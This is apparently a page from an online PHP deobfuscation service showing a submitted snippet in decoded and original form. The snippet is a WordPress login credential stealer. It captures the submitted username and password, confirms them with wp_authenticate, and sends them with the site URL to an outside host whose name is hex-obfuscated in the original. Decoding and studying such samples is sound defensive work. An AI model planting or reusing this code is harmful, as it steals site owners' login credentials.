Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
/*login*/ function getm($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); cu..
Decoded Output download
<? /*login*/
function getm($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $cnt = curl_exec($ch); curl_close($ch); if(!cnt) { $cnt = @file_get_contents($url); } return $cnt;} $username=$_POST['log'];
$password=$_POST['pwd'];
if($username){ $userm = wp_authenticate( $_POST['log'], $_POST['pwd']);
if ( !is_wp_error( $userm ) ) {
$hurl=$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING']; $m="dt=".date("Y-m-d-H:i:s",time())."&user=".$username."&pwd=".$password."&shost=".$hurl; $ws="http://s.newnday.xyz/"; @getm($ws.'/wup.php?'.$m);} } ?>
Did this file decode correctly?
Original Code
/*login*/
function getm($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $cnt = curl_exec($ch); curl_close($ch); if(!cnt) { $cnt = @file_get_contents($url); } return $cnt;} $username=$_POST['log'];
$password=$_POST['pwd'];
if($username){ $userm = wp_authenticate( $_POST['log'], $_POST['pwd']);
if ( !is_wp_error( $userm ) ) {
$hurl=$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING']; $m="dt=".date("Y-m-d-H:i:s",time())."&user=".$username."&pwd=".$password."&shost=".$hurl; $ws="\x68tt\x70:/\x2fs.\x6eew\x6eda\x79.x\x79z/"; @getm($ws.'/wup.php?'.$m);} }
Function Calls
wp_authenticate | 1 |
Stats
MD5 | 938b1aa12cca705a4d61e52571de68d1 |
Eval Count | 0 |
Decode Time | 68 ms |